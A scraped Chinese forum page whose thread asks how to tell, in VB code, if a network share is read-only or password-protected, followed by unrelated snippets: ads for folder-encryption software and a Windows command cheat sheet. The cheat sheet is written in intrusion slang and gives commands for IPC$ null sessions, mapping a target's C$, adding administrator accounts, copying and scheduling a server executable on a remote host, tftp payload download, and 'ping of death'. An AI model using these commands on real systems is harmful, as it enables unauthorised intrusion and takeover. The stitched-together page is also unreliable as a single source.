怎样判断一个网络上共享文件夹是只读的或者是设密码的?

MyLf 2002-09-08 09:54:49
如果是用API则请说明参数的意义和用法。
谢谢!
...全文
35 10 打赏 收藏 转发到动态 举报
写回复
用AI写文章
10 条回复
切换为时间正序
请发表友善的回复…
发表回复
MyLf 2003-05-10
  • 打赏
  • 举报
回复
我这个问题也不知是多长时间了,要强行结贴了。
给分了。
bestofbest 2002-10-17
  • 打赏
  • 举报
回复
恐怕有点难吧

你是用什么方法在连接的呢?
你引用那个目录是使用什么语句?
那个目录你用什么方法表示?
"\\coffee\share"?

我看还是往里面写东西吧,是个简单的方法


asdfsdfrewrwesr 2002-09-19
  • 打赏
  • 举报
回复
你打开看看好了。 要密码, 就是有密码。
MyLf 2002-09-19
  • 打赏
  • 举报
回复
To oceanmap: 那個函數不行,它和文件系統對象的Attributes屬性一樣的用法。
To RSide(R代码) :你也許沒有明白我的問題吧,我是說編程!!!

我很奇怪,這個問題是很難還是太簡單了,問了這麼久沒有解決 呵!
oceanmap 2002-09-19
  • 打赏
  • 举报
回复
用API函数GetFileAttributes试试
MyLf 2002-09-18
  • 打赏
  • 举报
回复
To ckc(火) :
我知道用文件系統對象可以判斷,不過判斷只讀的...
不要給我說是用寫一個文件,看能不能寫的方法來判斷哦!!
ckc 2002-09-15
  • 打赏
  • 举报
回复
取一下文件列表试试,取不到就是加了密码的
MyLf 2002-09-15
  • 打赏
  • 举报
回复
是不是这个问题没难度啊?
各位是怎么解决的?
网络咖啡 2002-09-14
  • 打赏
  • 举报
回复
GZ
MyLf 2002-09-13
  • 打赏
  • 举报
回复
几天没来了,怎么没有人帮一下?
共享文件夹加密超级大师是一款强大的文件夹加密软件。软件专为企业用户计,可以有效保护局域网共享文件夹。软件功能非常强大,具有共享文件夹用户权限置、防复制、防截屏、防删除、防另存为、禁用剪贴板等功能,加密后的共享文件夹具备防复制、防截屏、防删除、防另存为、禁用剪贴板等功能,是企业共享文件加密管理的最佳选择!如果对这方面有需求的可以下载体验下。 共享文件夹加密超级大师主要功能和特点 功能强大的用户管理和权限管理系统 加密的共享文件夹可以添加多个普通用户,普通用户可以置不同的用户名、密码和权限。 11种用户权限,如打开文件、修改文件、使用剪切板(禁止使用剪切板用户将无法复制、移动文件和复制文件里的内容)、删除文件、打印文件等。 还可以置用户使用共享文件夹的次数和用户的有效期。 加密解密速度超快方便易用 可以几秒内完成对共享文件夹的加密。 可以一次加密多个共享文件夹共享文件夹加密、解密过程简单方便。 共享文件夹加密后使用简单易上手 共享文件夹加密后里面的文件就全部隐藏加密了,只需要运行共享文件夹里面的客户端就可以了。 加密共享文件夹客户端使用方法和系统里面的资源管理器一致,不需要学习就可以简单上手。 保密性极高 共享文件夹加密后保密性极高,没有正确用户名和密码无法看到和使用共享文件夹里面的加密文件。 软件安装部署简单方便 共享文件夹加密超级大师只需在服务器安装一次即可全网使用,客户端无需安装! 共享文件夹加密超级大师 v1.15官方版 更新日志 添加了客户端用户视图置保存的功能。 * 改善了加密文件保护系统的安全行和保护强度。 * 改善了客户端只读功能的安全性。 * 改善了加密端的软件安全性。 - 修复了加密端多实例启动的BUG。 - 修复了加密端高级选项窗口显示错误。 共享文件夹加密超级大师的安装   把下载好的安装包解压到当前文件夹,之后双击【sfesetup.exe】运行文件进行安装,打开的时候会出现安装框,依次开始安装,依照步骤点击下一步,并选择同意协议和软件安装位置即可。 点击【完成】按钮,共享文件夹加密超级大师软件安装过程就完成了。 共享文件夹加密超级大师的使用 安装完成后,点击【共享文件夹加密超级大师】快捷方式即可进入共享文件夹加密超级大师软件。如图所示,这是软件的主界面。运行共享文件夹加密超级大师软件,可以看到如下界面。点击“添加文件夹”或“添加磁盘”,选择需要加密的共享文件夹或共享磁盘。 选择需要加密的共享文件夹后,点击“普通用户权限置”,在这里可以添加普通用户组并置相对应的权限。点击“添加用户”,然后在弹出的窗口中添加普通用户并置权限。 用户名和权限置好之后,点击“高级选项”。在这里可以选择加密强度、共享文件夹控制端程序名称和窗口标题。 高级选项置完成后,点击“立即加密”,输入管理员密码,然后点击“加密”。加密完成。软件的功能就大致介绍到这里了,软件其余的具体功能就有小伙伴们自己去发掘吧。 共享文件夹加密超级大师的卸载 依次选择开始-> 所有程序 ->共享文件夹加密超级大师软件->卸载共享文件夹加密超级大师软件。或者依次打开我的电脑->卸载或更改程序->卸载你所卸载的软件,您可以用 Window XP控制面板中的添加或删除程序功能,或用 Windows Vista、Windows 7中的程序和功能删除共享文件夹加密超级大师软件, 然后点击开始卸载,按步骤依次点击下一步,直至完成。
共享资料保护专家高级版》安装说明 《 文件夹只读加密,经过加密后的文件夹里所有文件只能运行、查看,禁止复制、拷贝、删除、移动,安全高效而实用。 ● 需要密码访问方式:经过对文件夹密码加密后,只有知道密码的人方可访问加密文件夹里的文件和文件夹, ● 不需要密码访问方式:通过该方式加密后,加密文件夹不需要密码即可访问和打开,进入该文件夹只能查看或运行其中的文件,但是禁止复制、删除、屏幕抓图和拷贝等。(非常适合通过U盘加密资料文件夹后给用户演示等场合) ● 实现对文件夹进行加密处理,加密之后的文件夹无法进行删除、复制、屏幕抓图和移动等文件操作。 ● 用户打开加密后的文件夹,可以浏览、查看和运行里面的文件资料,但是不能删除、复制和移动加密文件夹里的内容,实现了真正意义上的“只读”,安全可靠。 ●打开次数限制:当您置允许用户打开次数限制时,用户达到了您定的次数。这时只能通过输入密码才能再次打开浏览文件。 ● 软件在打开加密的文件夹后,采用了最新的系统HOOK技术,实现对加密的文件夹、键盘、文件复制/移动/删除/屏幕抓图等操作进行了监控,有效防止非法用户拷贝你的资料。 ● 本软件支持网络环境下的加密:你可以在服务器上先建立一个文件夹,把允许工作站访问或查看的文件拷贝到该文件夹下,然后把该文件夹进行加密处理,最后完全共享此文件夹。这样其他用户可以看到并访问该文件夹的内容,但是不能复制和移动里面的资料。
netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况,常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于置超时间隔。 ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息 tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 net use $">\\ip\ipc$ " " /user:" " 建立IPC空链接 net use $">\\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: $">\\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: $">\\ip\c$ 登陆后映射对方C:到本地为H: net use $">\\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名 密码 /add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名 开启服务;(如:net start telnet, net start schedule) net stop 服务名 停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络置 net logoff 断开连接的共享 net pause 服务名 暂停某服务 net send ip "文本信息" 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C:共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码 更改系统登陆密码 del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同) move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令 at id号 开启已注册的某个计划任务 at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止 at id号 /delete 停止某个已注册的计划任务 at 查看所有的计划任务 at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 finger username @host 查看最近有哪些用户登陆 telnet ip 端口 远和登陆服务器,默认端口为23 open ip 连接到IP(属telnet登陆后的命令) telnet 在本机上直接键入telnet 将进入本机的telnet copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件 copy c:\srv.exe $">\\ip\admin$ 复制本地c:\srv.exe到对方的admin下 cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件 copy $\svv.exe">\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C: xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件 tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,
共享资料保护专家高级版 文件夹只读加密,经过加密后的文件夹里所有文件只能运行、查看,禁止复制、拷贝、删除、移动,安全高效而实用。 ● 需要密码访问方式:经过对文件夹密码加密后,只有知道密码的人方可访问加密文件夹里的文件和文件夹, ● 不需要密码访问方式:通过该方式加密后,加密文件夹不需要密码即可访问和打开,进入该文件夹只能查看或运行其中的文件,但是禁止复制、删除、屏幕抓图和拷贝等。(非常适合通过U盘加密资料文件夹后给用户演示等场合) ● 实现对文件夹进行加密处理,加密之后的文件夹无法进行删除、复制、屏幕抓图和移动等文件操作。 ● 用户打开加密后的文件夹,可以浏览、查看和运行里面的文件资料,但是不能删除、复制和移动加密文件夹里的内容,实现了真正意义上的“只读”,安全可靠。 ●打开次数限制:当您置允许用户打开次数限制时,用户达到了您定的次数。这时只能通过输入密码才能再次打开浏览文件。 ● 软件在打开加密的文件夹后,采用了最新的系统HOOK技术,实现对加密的文件夹、键盘、文件复制/移动/删除/屏幕抓图等操作进行了监控,有效防止非法用户拷贝你的资料。 ● 本软件支持网络环境下的加密:你可以在服务器上先建立一个文件夹,把允许工作站访问或查看的文件拷贝到该文件夹下,然后把该文件夹进行加密处理,最后完全共享此文件夹。这样其他用户可以看到并访问该文件夹的内容,但是不能复制和移动里面的资料。

1,502

社区成员

发帖
与我相关
我的任务
社区描述
VB 网络编程
社区管理员
  • 网络编程
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧